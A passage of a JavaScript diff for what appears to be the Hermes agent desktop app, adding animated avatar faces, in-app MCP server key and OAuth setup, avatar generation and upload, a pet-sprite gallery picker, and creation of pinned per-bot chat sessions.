+  dots.forEach((dot, i) => {
+    const o = i === 0 ? pose.d0 : i === 1 ? pose.d1 : pose.d2
+    dot.setAttribute('opacity', String(o))
+  })
+
+  svg.style.transform = `rotate(${pose.tilt}deg)`
+  svg.style.transformOrigin = '50% 70%'
+}
+
+function walkMathFaces(root, acc) {
+  if (!root || !root.querySelectorAll) {
+    return acc
+  }
+
+  root.querySelectorAll('svg[data-hb-math]').forEach(node => acc.push(node))
+  root.querySelectorAll('*').forEach(el => {
+    if (el.shadowRoot) {
+      walkMathFaces(el.shadowRoot, acc)
+    }
+  })
+  return acc
+}
+
+function startFaceClock() {
+  if (typeof window === 'undefined' || window.__hbFaceClock) {
+    return
+  }
+
+  window.__hbFaceClock = true
+  const t0 = performance.now()
+  // The shadow-root walk over the whole document is the expensive part —
+  // do it at ~1Hz and paint the cached list per frame. Skip paints while
+  // the window is hidden; rAF is throttled there anyway, but be explicit.
+  let faces = []
+  let lastScan = -Infinity
+
+  const tick = now => {
+    if (!document.hidden) {
+      if (now - lastScan > 1000) {
+        faces = walkMathFaces(document, [])
+        lastScan = now
+      }
+      const t = (now - t0) / 1000
+      for (const svg of faces) {
+        if (svg.isConnected) {
+          paintMathFace(svg, t)
+        }
+      }
+    }
+    window.requestAnimationFrame(tick)
+  }
+
+  window.requestAnimationFrame(tick)
+}
+
+/**
+ * Live math face. Photos still use <img>. Shape avatars stay SVG so
+ * the clock can move them (a baked PNG cannot).
+ */
+function BotFace({ shape, color, image, size = 36, name = 'agent', mood = 'idle' }) {
+  startFaceClock()
+
+  if (image) {
+    return jsx('img', {
+      src: image,
+      alt: '',
+      'aria-hidden': true,
+      style: { width: size, height: size, borderRadius: '22%', objectFit: 'cover', display: 'block' }
+    })
+  }
+
+  // Sigils are line art (no filled body) — the math clock rebuilds filled
+  // outlines, which would turn a stored sigil pick into a blank circle.
+  // Keep the legacy static render for them so old picks still draw.
+  if (shape.startsWith('sigil-')) {
+    const eyes = jsxs('g', {
+      children: [
+        jsx('circle', { cx: 16, cy: 14, r: 2.4, fill: color }),
+        jsx('circle', { cx: 24, cy: 14, r: 2.4, fill: color })
+      ]
+    })
+    return jsxs('svg', {
+      'data-bot-face': name,
+      viewBox: '0 0 40 40',
+      width: size,
+      height: size,
+      'aria-hidden': true,
+      children: [shapeNode(shape, color, name), eyes]
+    })
+  }
+
+  const working = mood === 'work'
+  const eyeFill = isDarkColor(color) ? 'rgba(232,220,195,0.95)' : 'rgba(0,0,0,0.85)'
+  const ring = sampleFaceRing(shape)
+  const rest = facePose(working ? 'work' : 'idle', 0)
+
+  return jsxs('svg', {
+    'data-bot-face': name,
+    'data-hb-math': '1',
+    'data-hb-mood': working ? 'work' : 'idle',
+    'data-hb-shape': shape || 'circle',
+    viewBox: '0 0 40 44',
+    width: size,
+    height: size,
+    'aria-hidden': true,
+    style: { overflow: 'visible', display: 'block' },
+    children: [
+      jsx('path', {
+        'data-hb-body': '1',
+        d: shape === 'cloud'
+          ? 'M11 32 a7.5 7.5 0 0 1 -1 -14.9 A9.5 9.5 0 0 1 29 12.5 A7 7 0 0 1 30 32 Z'
+          : ringToPath(ring),
+        fill: color
+      }),
+      jsxs('g', {
+        'data-hb-open': '1',
+        children: [
+          jsx('ellipse', { 'data-hb-el': '1', cx: 15.4, cy: 17.2, rx: 2.2, ry: working ? 2.6 : 2.3, fill: eyeFill }),
+          jsx('ellipse', { 'data-hb-er': '1', cx: 24.6, cy: 17.2, rx: 2.2, ry: working ? 2.6 : 2.3, fill: eyeFill }),
+          jsx('circle', { cx: 14.8, cy: 16.5, r: 0.65, fill: 'rgba(255,255,255,0.85)' }),
+          jsx('circle', { cx: 24, cy: 16.5, r: 0.65, fill: 'rgba(255,255,255,0.85)' })
+        ]
+      }),
+      jsx('path', {
+        'data-hb-shut': '1',
+        d: 'M12.8 17.2 L18 17.2 M22 17.2 L27.2 17.2',
+        stroke: eyeFill,
+        strokeWidth: 2,
+        strokeLinecap: 'round',
+        fill: 'none',
+        opacity: 0
+      }),
+      working
+        ? jsxs('g', {
+            children: [
+              jsx('circle', { 'data-hb-dot': '1', cx: 16.4, cy: 41.2, r: 1.15, fill: color, opacity: rest.d0 }),
+              jsx('circle', { 'data-hb-dot': '1', cx: 20, cy: 41.2, r: 1.15, fill: color, opacity: rest.d1 }),
+              jsx('circle', { 'data-hb-dot': '1', cx: 23.6, cy: 41.2, r: 1.15, fill: color, opacity: rest.d2 })
+            ]
+          })
+        : null
+    ]
+  })
+}
+
+// -- inline MCP setup (per-profile), driven by the mcp.servers.* gateway RPCs --
+// Feature-detected: if the gateway predates those RPCs the setup button hides
+// and the row falls back to the "run hermes mcp / Settings" hint. profile is
+// the target bot's profile name (its config is what we write).
+
+async function mcpRpc(method, params) {
+  // Returns { ok, result } or { ok:false, unsupported:true } when the gateway
+  // doesn't know the method (older backend) vs a real error.
+  try {
+    const res = await host.request(method, params)
+    return { ok: true, result: res }
+  } catch (err) {
+    const msg = String((err && err.message) || err || '')
+    if (/unknown method/i.test(msg)) {
+      return { ok: false, unsupported: true }
+    }
+    return { ok: false, error: msg }
+  }
+}
+
+// Probe whether the new lifecycle RPCs exist on this gateway (cached per session).
+let _mcpRpcSupported = null
+async function mcpSetupSupported() {
+  if (_mcpRpcSupported !== null) {
+    return _mcpRpcSupported
+  }
+  const r = await mcpRpc('mcp.servers.list', {})
+  _mcpRpcSupported = !(r.ok === false && r.unsupported)
+  return _mcpRpcSupported
+}
+
+function McpSetupButton({ profile, entry, onDone, ensureProfile }) {
+  // entry: { name, requires:[env keys], auth?, fromCatalog, installed }
+  // profile may be null at first (New Agent: the profile isn't created yet).
+  // ensureProfile() lazily creates it on the first setup action and returns the
+  // slug, so OAuth / API-key setup works DURING creation, not only in Edit.
+  const [phase, setPhase] = useState('idle') // idle | keys | oauth | busy | done | error
+  const [supported, setSupported] = useState(null)
+  const [keyValues, setKeyValues] = useState({})
+  const [message, setMessage] = useState('')
+  const pollRef = useRef(null)
+  const profileRef = useRef(profile || null)
+
+  useEffect(() => {
+    if (profile) {
+      profileRef.current = profile
+    }
+  }, [profile])
+
+  // Resolve the target profile, creating it on demand for the New Agent flow.
+  const resolveProfile = async () => {
+    if (profileRef.current) {
+      return profileRef.current
+    }
+    if (ensureProfile) {
+      const created = await ensureProfile()
+      if (created) {
+        profileRef.current = created
+      }
+      return created
+    }
+    return null
+  }
+
+  useEffect(() => {
+    let alive = true
+    mcpSetupSupported().then(ok => {
+      if (alive) setSupported(ok)
+    })
+    return () => {
+      alive = false
+      if (pollRef.current) {
+        clearInterval(pollRef.current)
+        pollRef.current = null
+      }
+    }
+  }, [])
+
+  const isOAuth = (entry.auth || '').toLowerCase() === 'oauth'
+  const requires = entry.requires || []
+
+  const beginKeys = async () => {
+    // Ensure the server exists in the target profile first (add from catalog).
+    setPhase('busy')
+    setMessage('')
+    const profile = await resolveProfile()
+    if (!profile) {
+      setPhase('idle')
+      return
+    }
+    if (entry.fromCatalog && !entry.installed) {
+      const add = await mcpRpc('mcp.servers.add', { profile, name: entry.name, preset: entry.name })
+      if (!add.ok) {
+        setPhase('error')
+        setMessage(add.error || 'Could not add server')
+        return
+      }
+    }
+    setPhase(isOAuth ? 'oauth' : 'keys')
+  }
+
+  const submitKeys = async () => {
+    setPhase('busy')
+    const profile = profileRef.current
+    if (!profile) {
+      setPhase('error')
+      setMessage('No target profile')
+      return
+    }
+    for (const k of requires) {
+      const val = (keyValues[k] || '').trim()
+      if (!val) {
+        continue
+      }
+      const r = await mcpRpc('mcp.servers.set_api_key', { profile, name: entry.name, env_var: k, value: val })
+      if (!r.ok) {
+        setPhase('error')
+        setMessage(r.error || ('Failed to set ' + k))
+        return
+      }
+    }
+    // Verify via test.
+    const t = await mcpRpc('mcp.servers.test', { profile, name: entry.name })
+    if (t.ok && t.result && (t.result.ok || (t.result.result && t.result.result.ok))) {
+      setPhase('done')
+      host.notify({ kind: 'success', message: entry.name + ' configured' })
+      onDone && onDone()
+    } else {
+      setPhase('error')
+      setMessage((t.result && (t.result.error || (t.result.result && t.result.result.error))) || 'Server test failed after setup')
+    }
+  }
+
+  const beginOAuth = async () => {
+    setPhase('busy')
+    setMessage('')
+    const profile = await resolveProfile()
+    if (!profile) {
+      setPhase('idle')
+      return
+    }
+    if (entry.fromCatalog && !entry.installed) {
+      const add = await mcpRpc('mcp.servers.add', { profile, name: entry.name, preset: entry.name })
+      if (!add.ok) {
+        setPhase('error')
+        setMessage(add.error || 'Could not add server')
+        return
+      }
+    }
+    const start = await mcpRpc('mcp.servers.oauth.start', { profile, name: entry.name })
+    const payload = start.result && (start.result.result || start.result)
+    const authUrl = payload && (payload.auth_url || payload.verification_url)
+    const sessionId = payload && payload.session_id
+    if (!start.ok || !authUrl || !sessionId) {
+      setPhase('error')
+      setMessage((start.error) || 'Could not start OAuth')
+      return
+    }
+    // Open the auth URL in the native browser, same as provider OAuth.
+    try {
+      if (host.openExternal) {
+        host.openExternal(authUrl)
+      } else if (typeof window !== 'undefined' && window.hermesDesktop && window.hermesDesktop.openExternal) {
+        window.hermesDesktop.openExternal(authUrl)
+      } else {
+        window.open(authUrl, '_blank')
+      }
+    } catch {
+      /* fall through to poll; user can open the URL from the toast */
+    }
+    setPhase('oauth')
+    setMessage('Complete sign-in in your browser...')
+    pollRef.current = setInterval(async () => {
+      const poll = await mcpRpc('mcp.servers.oauth.poll', { profile, name: entry.name, session_id: sessionId })
+      const pd = poll.result && (poll.result.result || poll.result)
+      const status = pd && pd.status
+      if (status === 'approved') {
+        clearInterval(pollRef.current)
+        pollRef.current = null
+        setPhase('done')
+        host.notify({ kind: 'success', message: entry.name + ' authenticated' })
+        onDone && onDone()
+      } else if (status === 'error') {
+        clearInterval(pollRef.current)
+        pollRef.current = null
+        setPhase('error')
+        setMessage((pd && pd.error_message) || 'OAuth failed')
+      }
+    }, 2000)
+  }
+
+  if (supported === false) {
+    return jsx('span', {
+      className: 'ml-1.5 text-[0.65rem] text-(--ui-text-quaternary)',
+      children: 'needs setup (' + requires.join(', ') + ') \u2014 restart the gateway to enable in-app setup'
+    })
+  }
+  if (phase === 'done') {
+    return jsx('span', { className: 'ml-1.5 text-[0.65rem] text-(--ui-success,#22c55e)', children: 'set up \u2713' })
+  }
+  if (phase === 'keys') {
+    return jsxs('div', {
+      className: 'mt-1 grid gap-1',
+      children: [
+        ...requires.map(k =>
+          jsx(Input, {
+            key: k,
+            type: 'password',
+            className: 'h-6 text-[0.7rem]',
+            placeholder: k,
+            value: keyValues[k] || '',
+            onChange: e => setKeyValues(prev => ({ ...prev, [k]: e.target.value }))
+          }, k)
+        ),
+        jsxs('div', {
+          className: 'flex gap-1',
+          children: [
+            jsx(Button, { size: 'xs', variant: 'secondary', onClick: () => void submitKeys(), children: 'Save & test' }),
+            jsx(Button, { size: 'xs', variant: 'ghost', onClick: () => setPhase('idle'), children: 'Cancel' })
+          ]
+        })
+      ]
+    })
+  }
+  if (phase === 'oauth') {
+    return jsx('span', { className: 'ml-1.5 text-[0.65rem] text-(--ui-text-quaternary)', children: message || 'Authorizing\u2026' })
+  }
+  if (phase === 'busy') {
+    return jsx('span', { className: 'ml-1.5 text-[0.65rem] text-(--ui-text-quaternary)', children: 'Working\u2026' })
+  }
+  if (phase === 'error') {
+    return jsxs('span', {
+      className: 'ml-1.5 text-[0.65rem] text-(--ui-danger,#ef4444)',
+      children: [(message || 'Setup failed') + ' ', jsx('button', { className: 'underline', onClick: () => setPhase('idle'), children: 'retry' })]
+    })
+  }
+  // idle
+  return jsx('button', {
+    className: 'ml-1.5 text-[0.65rem] text-(--ui-accent,#4f9cf9) underline',
+    onClick: () => void (isOAuth ? beginOAuth() : beginKeys()),
+    children: isOAuth ? 'Sign in\u2026' : 'Set up\u2026'
+  })
+}
+
+function botAppearance(name, meta) {
+  // The primary profile is literally named "default"; the SDK's profileColor
+  // can hand it a near-black that renders as an ugly black square, and any
+  // auto-seeded color in local bot-meta would otherwise stick. Give the
+  // primary a nice fixed generic look (a friendly violet squircle). A user's
+  // EXPLICIT customization still wins: an uploaded/generated/pet image, or a
+  // shape/color they set via the editor (tracked by meta.custom === true).
+  const isPrimary = (name || '').trim().toLowerCase() === 'default'
+  const userCustomized = Boolean(meta?.custom)
+  if (isPrimary && !userCustomized) {
+    return { shape: 'squircle', color: '#8b5cf6', image: meta?.image || null }
+  }
+  return {
+    shape: meta?.shape || defaultShapeFor(name),
+    color: meta?.color || profileColor(name),
+    image: meta?.image || null
+  }
+}
+
+// ── image avatars: upload from device + generate via image.generate ─────────
+
+/** Downscale to a small square so plugin storage stays light. */
+function normalizeAvatarImage(dataUrl, edge = 256) {
+  return new Promise(resolve => {
+    const img = new Image()
+    img.onload = () => {
+      try {
+        const canvas = document.createElement('canvas')
+        canvas.width = edge
+        canvas.height = edge
+        const ctx2d = canvas.getContext('2d')
+        const side = Math.min(img.width, img.height)
+        ctx2d.drawImage(img, (img.width - side) / 2, (img.height - side) / 2, side, side, 0, 0, edge, edge)
+        resolve(canvas.toDataURL('image/png'))
+      } catch {
+        resolve(dataUrl)
+      }
+    }
+    img.onerror = () => resolve(dataUrl)
+    img.src = dataUrl
+  })
+}
+
+function pickImageFromDevice() {
+  return new Promise(resolve => {
+    const input = document.createElement('input')
+    input.type = 'file'
+    input.accept = 'image/png,image/jpeg,image/webp,image/gif'
+    input.onchange = () => {
+      const file = input.files?.[0]
+
+      if (!file) {
+        return resolve(null)
+      }
+
+      if (file.size > 15_000_000) {
+        host.notify({ kind: 'error', message: 'Image too large (max 15MB).' })
+        return resolve(null)
+      }
+
+      const reader = new FileReader()
+      reader.onload = () => resolve(typeof reader.result === 'string' ? reader.result : null)
+      reader.onerror = () => resolve(null)
+      reader.readAsDataURL(file)
+    }
+    input.click()
+  })
+}
+
+/** Cached probe: does the gateway have an image backend? A `false` answer
+ *  is re-checked on every dialog open — the gateway may have been restarted
+ *  (picking up image.generate) or a backend enabled since the last probe.
+ *  Only `true` is sticky. */
+const $imagenAvailable = atom(null)
+let imagenProbeInflight = null
+
+function probeImagen() {
+  if (imagenProbeInflight) {
+    return imagenProbeInflight
+  }
+
+  imagenProbeInflight = host
+    .request('image.generate', { probe: true })
+    .then(res => $imagenAvailable.set(Boolean(res?.available)))
+    .catch(() => $imagenAvailable.set(false))
+    .finally(() => {
+      imagenProbeInflight = null
+    })
+
+  return imagenProbeInflight
+}
+
+async function generateAvatarImage(bot, title, description) {
+  const who = [title || bot, description].filter(Boolean).join(' — ')
+  const res = await host.request('image.generate', {
+    prompt:
+      `Cute minimal robot avatar for an AI agent named "${who}". ` +
+      'Friendly simple mascot face, bold flat vector style, solid color background, centered, no text.',
+    aspect_ratio: 'square'
+  })
+
+  if (!res?.success) {
+    throw new Error(res?.error || 'generation failed')
+  }
+
+  // image_data (data URL) works over local AND remote gateways; the raw
+  // backend URL is the fallback when the gateway couldn't inline it.
+  return res.image_data || res.image
+}
+
+/** Shape grid + color swatches, shared by Edit Profile and New Agent.
+ *  Layout uses inline grid styles — arbitrary Tailwind classes like
+ *  `grid-cols-7` are NOT in the app's precompiled CSS, which collapsed
+ *  this into a single vertical column. */
+function AvatarPicker({ shape, color, image, onShape, onColor, onImage, generateSeed }) {
+  const pickerName = generateSeed?.name || 'agent'
+  const imagen = useValue($imagenAvailable)
+  const [tab, setTab] = useState('bot')
+  const [describe, setDescribe] = useState('')
+  const [genBusy, setGenBusy] = useState(false)
+
+  if (imagen === null) {
+    void probeImagen()
+  }
+
+  // Re-check a stale "unavailable" whenever the user lands on the Generate
+  // tab — the gateway may have restarted with image.generate since.
+  const goTab = id => {
+    setTab(id)
+
+    if (id === 'generate' && $imagenAvailable.get() === false) {
+      $imagenAvailable.set(null)
+      void probeImagen()
+    }
+  }
+
+  const upload = async () => {
+    const raw = await pickImageFromDevice()
+
+    if (raw) {
+      onImage(await normalizeAvatarImage(raw))
+    }
+  }
+
+  const generate = async () => {
+    if (genBusy) {
+      return
+    }
+
+    setGenBusy(true)
+
+    try {
+      const custom = describe.trim()
+      const img = custom
+        ? await (async () => {
+            const res = await host.request('image.generate', {
+              prompt: `${custom}. Avatar for an AI agent: centered, bold flat vector style, solid color background, no text.`,
+              aspect_ratio: 'square'
+            })
+
+            if (!res?.success) {
+              throw new Error(res?.error || 'generation failed')
+            }
+
+            return res.image_data || res.image
+          })()
+        : await generateAvatarImage(generateSeed?.name || 'agent', generateSeed?.title, generateSeed?.description)
+
+      if (img) {
+        onImage(await normalizeAvatarImage(img))
+      }
+    } catch (err) {
+      host.notifyError(err, 'Avatar generation failed')
+    } finally {
+      setGenBusy(false)
+    }
+  }
+
+  const tabButton = (id, label) =>
+    jsx(
+      'button',
+      {
+        type: 'button',
+        className: cn(
+          'rounded-full px-3 py-1 text-xs font-medium transition-colors',
+          tab === id
+            ? 'bg-(--chrome-action-hover) text-foreground'
+            : 'text-(--ui-text-tertiary) hover:text-(--ui-text-secondary)'
+        ),
+        onClick: () => goTab(id),
+        children: label
+      },
+      id
+    )
+
+  return jsxs('div', {
+    className: 'grid justify-items-center gap-3',
+    children: [
+      // Tab pills: Bot | Generate | Upload | Pet
+      jsxs('div', {
+        className: 'flex items-center gap-1',
+        children: [tabButton('bot', 'Bot'), tabButton('generate', 'Generate'), tabButton('upload', 'Upload'), tabButton('pet', 'Pet')]
+      }),
+
+      image && tab !== 'generate'
+        ? jsx(Button, {
+            type: 'button',
+            variant: 'ghost',
+            size: 'sm',
+            onClick: () => onImage(null),
+            children: 'Remove image — use shape'
+          })
+        : null,
+
+      tab === 'bot'
+        ? jsxs('div', {
+            className: 'grid justify-items-center gap-3',
+            children: [
+              jsx('div', {
+                style: {
+                  display: 'grid',
+                  gridTemplateColumns: 'repeat(4, minmax(0, 1fr))',
+                  gap: '6px',
+                  justifyItems: 'center'
+                },
+                children: AVATAR_PICKER_SHAPES.map(s =>
+                  jsx(
+                    'button',
+                    {
+                      type: 'button',
+                      className: cn(
+                        'flex items-center justify-center rounded-md transition-colors hover:bg-(--chrome-action-hover)',
+                        s === shape && !image && 'ring-1 ring-(--ui-accent)'
+                      ),
+                      style: { width: 44, height: 44 },
+                      onClick: () => {
+                        onImage(null)
+                        onShape(s)
+                      },
+                      children: jsx(BotFace, { shape: s, color, size: 32, name: pickerName })
+                    },
+                    s
+                  )
+                )
+              }),
+              jsx('div', {
+                style: {
+                  display: 'grid',
+                  gridTemplateColumns: 'repeat(5, minmax(0, 1fr))',
+                  gap: '8px',
+                  justifyItems: 'center'
+                },
+                children: AVATAR_COLORS.map(c =>
+                  jsx(
+                    'button',
+                    {
+                      type: 'button',
+                      className: cn(
+                        'rounded-full transition-transform hover:scale-110',
+                        c === color && 'ring-2 ring-(--ui-accent) ring-offset-1 ring-offset-(--ui-bg, transparent)'
+                      ),
+                      style: { width: 22, height: 22, backgroundColor: c },
+                      onClick: () => onColor(c)
+                    },
+                    c
+                  )
+                )
+              })
+            ]
+          })
+        : null,
+
+      tab === 'generate'
+        ? imagen
+          ? jsxs('div', {
+              className: 'grid w-full gap-2',
+              children: [
+                jsx(Textarea, {
+                  className: 'min-h-16 text-xs',
+                  placeholder: 'Describe your avatar…',
+                  value: describe,
+                  onChange: event => setDescribe(event.target.value)
+                }),
+                jsxs(Button, {
+                  type: 'button',
+                  variant: 'secondary',
+                  className: 'w-full justify-center',
+                  disabled: genBusy,
+                  onClick: generate,
+                  children: [
+                    genBusy
+                      ? jsx(GlyphSpinner, { spinner: 'breathe', className: 'mr-1 text-[0.8rem]' })
+                      : jsx(Codicon, { name: 'sparkle', className: 'mr-1 text-[0.8rem]' }),
+                    genBusy ? 'Generating…' : 'Generate'
+                  ]
+                }),
+                describe.trim()
+                  ? null
+                  : jsx('div', {
+                      className: 'text-center text-[0.65rem] text-(--ui-text-quaternary)',
+                      children: 'Leave blank to generate from the agent\u2019s name and description.'
+                    })
+              ]
+            })
+          : jsx('div', {
+              className: 'px-2 py-3 text-center text-xs leading-5 text-(--ui-text-tertiary)',
+              children:
+                imagen === false
+                  ? 'No image model available. If you just enabled one (or updated Hermes), restart the gateway: Ctrl+K → "Restart gateway".'
+                  : 'Checking image backend…'
+            })
+        : null,
+
+      tab === 'upload'
+        ? jsxs(Button, {
+            type: 'button',
+            variant: 'secondary',
+            className: 'w-full justify-center',
+            onClick: upload,
+            children: [jsx(Codicon, { name: 'device-camera', className: 'mr-1 text-[0.8rem]' }), 'Choose an image…']
+          })
+        : null,
+
+      tab === 'pet' ? jsx(PetTab, { image, onImage }) : null
+    ]
+  })
+}
+
+// ── pet tab: attach a petdex companion that lives beside the avatar ─────────
+
+// A petdex "spritesheet" is the FULL animation sheet (1536×1872 webp, ~2MB;
+// 8×9 grid of 192×208 frames). Using it as an <img> both downloads megabytes
+// per tile and shows the whole sheet squashed. Extract frame 0 once per slug
+// via canvas, downscale to 96px, and cache the data URL. Concurrency-capped
+// so opening the tab doesn't fire dozens of 2MB fetches at once.
+const PET_FRAME_W = 192
+const PET_FRAME_H = 208
+const petFrameCache = new Map()
+let petFetchActive = 0
+const petFetchQueue = []
+
+function pumpPetQueue() {
+  while (petFetchActive < 4 && petFetchQueue.length) {
+    const job = petFetchQueue.shift()
+    petFetchActive++
+    job().finally(() => {
+      petFetchActive--
+      pumpPetQueue()
+    })
+  }
+}
+
+function petFrameIcon(spriteUrl) {
+  if (!spriteUrl) {
+    return Promise.resolve(null)
+  }
+
+  if (!petFrameCache.has(spriteUrl)) {
+    petFrameCache.set(
+      spriteUrl,
+      new Promise(resolve => {
+        petFetchQueue.push(async () => {
+          try {
+            const resp = await fetch(spriteUrl, { signal: AbortSignal.timeout(15000) })
+            const blob = await resp.blob()
+            // Crop frame 0 during decode — never materialize the full sheet.
+            const bitmap = await createImageBitmap(blob, 0, 0, PET_FRAME_W, PET_FRAME_H)
+            const canvas = document.createElement('canvas')
+            canvas.width = 96
+            canvas.height = 104
+            canvas.getContext('2d').drawImage(bitmap, 0, 0, 96, 104)
+            bitmap.close()
+            resolve(canvas.toDataURL('image/png'))
+          } catch {
+            petFrameCache.delete(spriteUrl)
+            resolve(null)
+          }
+        })
+        pumpPetQueue()
+      })
+    )
+  }
+
+  return petFrameCache.get(spriteUrl)
+}
+
+/** One pet tile image: frame 0 only, resolved lazily through the cache. */
+function PetThumb({ spriteUrl, size = 40 }) {
+  const [icon, setIcon] = useState(null)
+
+  useEffect(() => {
+    let alive = true
+    petFrameIcon(spriteUrl).then(url => {
+      if (alive) {
+        setIcon(url)
+      }
+    })
+    return () => {
+      alive = false
+    }
+  }, [spriteUrl])
+
+  if (!icon) {
+    return jsx('div', {
+      style: { width: size, height: size, borderRadius: 6, background: 'var(--chrome-action-hover, rgba(255,255,255,0.06))' }
+    })
+  }
+
+  return jsx('img', {
+    src: icon,
+    alt: '',
+    style: { width: size, height: size, objectFit: 'contain', imageRendering: 'pixelated', borderRadius: 6 }
+  })
+}
+
+function PetTab({ image, onImage }) {
+  // Selection is dialog-local: committed by the dialog's Save like any
+  // uploaded/generated image (a direct meta write here gets clobbered by
+  // Save's own image state).
+  const [selectedSlug, setSelectedSlug] = useState(null)
+  const { data, isLoading } = useQuery({
+    queryKey: [ID, 'pet-gallery'],
+    queryFn: () => host.request('pet.gallery', {}),
+    staleTime: 300000
+  })
+  const [query, setQuery] = useState('')
+  // Windowed rendering: the gallery is 4500+ pets — mounting an <img> per pet
+  // froze the dialog. Render `limit` at a time and grow on scroll-to-bottom.
+  const [limit, setLimit] = useState(24)
+  const pets = data?.pets ?? []
+
+  if (isLoading) {
+    return jsx('div', {
+      className: 'flex justify-center py-4',
+      children: jsx(GlyphSpinner, { spinner: 'breathe', className: 'text-(--ui-text-tertiary)' })
+    })
+  }
+
+  if (!pets.length) {
+    return jsx('div', {
+      className: 'px-2 py-3 text-center text-xs text-(--ui-text-tertiary)',
+      children: 'No pets in the petdex gallery. Run `hermes pets` to explore.'
+    })
+  }
+
+  const q = query.trim().toLowerCase()
+  const filtered = q
+    ? pets.filter(pet => (pet.displayName || '').toLowerCase().includes(q) || (pet.slug || '').includes(q))
+    : pets
+  // Installed and curated pets surface first — they're the likeliest picks.
+  const ranked = filtered.slice().sort((a, b) => {
+    const rank = pet => (pet.installed ? 0 : pet.curated ? 1 : 2)
+    return rank(a) - rank(b)
+  })
+  const visible = ranked.slice(0, limit)
+
+  const onScroll = event => {
+    const el = event.currentTarget
+
+    if (el.scrollTop + el.clientHeight >= el.scrollHeight - 120 && limit < ranked.length) {
+      setLimit(prev => Math.min(prev + 24, ranked.length))
+    }
+  }
+
+  return jsxs('div', {
+    className: 'grid w-full gap-2',
+    children: [
+      jsx('div', {
+        className: 'text-center text-[0.65rem] text-(--ui-text-quaternary)',
+        children: 'Pick a pet as this agent’s profile picture.'
+      }),
+      jsx(Input, {
+        className: 'h-7 text-xs',
+        placeholder: `Search ${pets.length} pets…`,
+        value: query,
+        onChange: event => {
+          setQuery(event.target.value)
+          setLimit(24)
+        }
+      }),
+      image && selectedSlug
+        ? jsx(Button, {
+            type: 'button',
+            variant: 'ghost',
+            size: 'sm',
+            className: 'justify-center',
+            onClick: () => {
+              setSelectedSlug(null)
+              onImage(null)
+            },
+            children: 'Remove — back to shape avatar'
+          })
+        : null,
+      filtered.length === 0
+        ? jsx('div', {
+            className: 'py-3 text-center text-xs text-(--ui-text-quaternary)',
+            children: 'No pets match.'
+          })
+        : jsxs('div', {
+            onScroll,
+            style: { maxHeight: 220, overflowY: 'auto' },
+            children: [
+              jsx('div', {
+                style: {
+                  display: 'grid',
+                  gridTemplateColumns: 'repeat(3, minmax(0, 1fr))',
+                  gap: '6px'
+                },
+                children: visible.map(pet =>
+                  jsxs(
+                    'button',
+                    {
+                      type: 'button',
+                      className: cn(
+                        'grid justify-items-center gap-1 rounded-md p-1.5 transition-colors hover:bg-(--chrome-action-hover)',
+                        selectedSlug === pet.slug && 'ring-1 ring-(--ui-accent)'
+                      ),
+                      onClick: () => {
+                        // The pet IS the profile picture: extract frame 0
+                        // and hand it to the dialog as the avatar image.
+                        // Persisted when the user hits Save.
+                        setSelectedSlug(pet.slug)
+                        void petFrameIcon(pet.spritesheetUrl).then(icon => {
+                          if (icon) {
+                            onImage(icon)
+                          } else {
+                            setSelectedSlug(null)
+                            host.notify({ kind: 'error', message: 'Could not load that pet — try another.' })
+                          }
+                        })
+                      },
+                      children: [
+                        jsx(PetThumb, { spriteUrl: pet.spritesheetUrl, size: 40 }),
+                        jsx('span', {
+                          className: 'w-full truncate text-center text-[0.6rem] text-(--ui-text-tertiary)',
+                          children: pet.displayName
+                        })
+                      ]
+                    },
+                    pet.slug
+                  )
+                )
+              }),
+              limit < ranked.length
+                ? jsx('div', {
+                    className: 'py-2 text-center text-[0.65rem] text-(--ui-text-quaternary)',
+                    children: `Scroll for more (${limit} of ${ranked.length})`
+                  })
+                : null
+            ]
+          })
+    ]
+  })
+}
+
+// ── data ─────────────────────────────────────────────────────────────────────
+
+/** True once profiles.list reports the backend injects the bot-to-bot
+ *  protocol into the system prompt itself (hermes-agent bot_mode_probe).
+ *  Gates every SOUL.md protocol append below. */
+let serverInjectsProtocol = false
+
+function useRoster() {
+  return useQuery({
+    queryKey: ROSTER_KEY,
+    queryFn: async () => {
+      const res = await host.request('profiles.list', {})
+      // Newer backends inject the teammate-messaging protocol into every
+      // session's system prompt (agent.bot_mode_protocol) — SOUL.md must not
+      // carry a second copy. Older gateways lack the flag: keep appending.
+      serverInjectsProtocol = Boolean(res?.bot_mode_protocol)
+      return res
+    },
+    refetchInterval: 5000,
+    staleTime: 5000,
+    // Remote (SSH) gateways connect slowly and drop on sleep/wake; keep
+    // retrying instead of latching a terminal error card.
+    retry: true,
+    retryDelay: attempt => Math.min(15000, 1000 * 2 ** attempt)
+  })
+}
+
+/** The @handle users tag a bot with. The primary profile's callable alias
+ *  is 'hermes' — the mention middleware resolves it back to 'default' — so
+ *  the word 'default' never surfaces in the UI. */
+function botHandle(name) {
+  return (name || '').trim().toLowerCase() === 'default' ? 'hermes' : name
+}
+
+function showsHandle(name, meta) {
+  const display = displayName({ name }, meta)
+  return Boolean(name && display.toLowerCase() !== botHandle(name).toLowerCase())
+}
+
+// ── canonical bot chat ───────────────────────────────────────────────────────
+// Each bot has ONE forever chat, pinned by stored-session id in bot meta
+// (meta.chat — synced server-side via ui_meta, so it follows the profile).
+// Opening a bot ALWAYS lands there: never "most recent session", which
+// drifts whenever the profile is used from the CLI, Sessions mode, or a
+// cronjob. The pin only changes through explicit adoption:
+//   - grandfather: first open of a bot that already has history pins its
+//     current latest session, so continuity starts from the chat in use
+//   - fresh bot: opens a draft; when the first message persists a stored
+//     session, we adopt that id (empty sessions are pruned server-side, so
+//     pre-creating one at enable time is not possible)
+//   - recovery: if the pinned id vanishes from the DB (compaction rewrote
+//     the lineage), re-pin the newest session carrying the canonical title.
+
+// In-flight creations, keyed by bot name — double-clicking a row must not
+// mint two canonical chats.
+const canonicalCreations = new Map()
+
+/** Create the bot's ONE forever chat: a real session opened with a kickoff
+ *  message (the gateway prunes zero-message sessions, so the chat is born
+ *  with the bot introducing itself). Pins the stored id in bot meta and
+ *  returns it. */
+function createCanonicalChat(name) {
+  const inflight = canonicalCreations.get(name)
+
+  if (inflight) {
+    return inflight
+  }
+
+  const run = (async () => {
+    const res = await host.request('session.create', {
+      profile: name,
+      title: 'Bot Chat',
+      // Born hidden from the global sidebar when the pref is on. Core applies
+      // this via the generic `hidden` flag (deferred as pending_hidden until the
+      // row exists); older gateways ignore the unknown param and it stays visible.
+      ...($hideBotChats.get() ? { hidden: true } : {})
+    })
+    const sid = res?.stored_session_id
+    const runtime = res?.session_id
+
+    if (sid) {
+      saveBotMeta(name, { chat: sid })
+    }
+
